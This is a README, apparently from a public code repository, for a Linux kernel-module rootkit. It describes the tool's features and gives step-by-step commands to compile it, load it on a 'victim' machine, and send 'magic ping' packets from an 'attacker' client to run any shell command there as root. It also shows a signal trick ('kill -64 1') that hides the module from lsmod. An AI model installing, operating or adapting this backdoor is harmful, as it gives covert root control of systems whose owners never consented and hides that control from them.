linux-rootkit
linux-rootkit copied to clipboard
Remote Linux Loadable Kernel Module (LKM) rootkit (For Linux Kernels 5.x). Shell command execution by ping.
Magic ping - shell execution
Features:
- Romete shell command execution by ping.
- Hiding (or Showing) Kernel Module from Userspace.
Asciinema Demo
Compile
compile server(victim) kernel module:
cd server && make
Client(attacker):
cd client && make
Romete server (victim):
sudo insmod server.ko
Local attacker:
Need root privilege to send icmp packets for ping.
sudo ./client <victim ip address>
Then you can let remote victim execute whatever shell command you input as root privilege (some command may need full path).
Hide(Show) remote kernel module:
Send signal 64 to show or hide:
kill -64 1
Use lsmod
to check.
Thanks && Reference:
- Hacking the Linux Kernel Network Stack
- Does tcpdump bypass iptables?
- linux-network-programming-ping.c
- Given a git commit hash, how to find out which kernel release contains it?
- Linux Rootkits Part 5: Hiding Kernel Modules from Userspace
- Hooking Linux Kernel Functions, Part 2: How to Hook Functions with Ftrace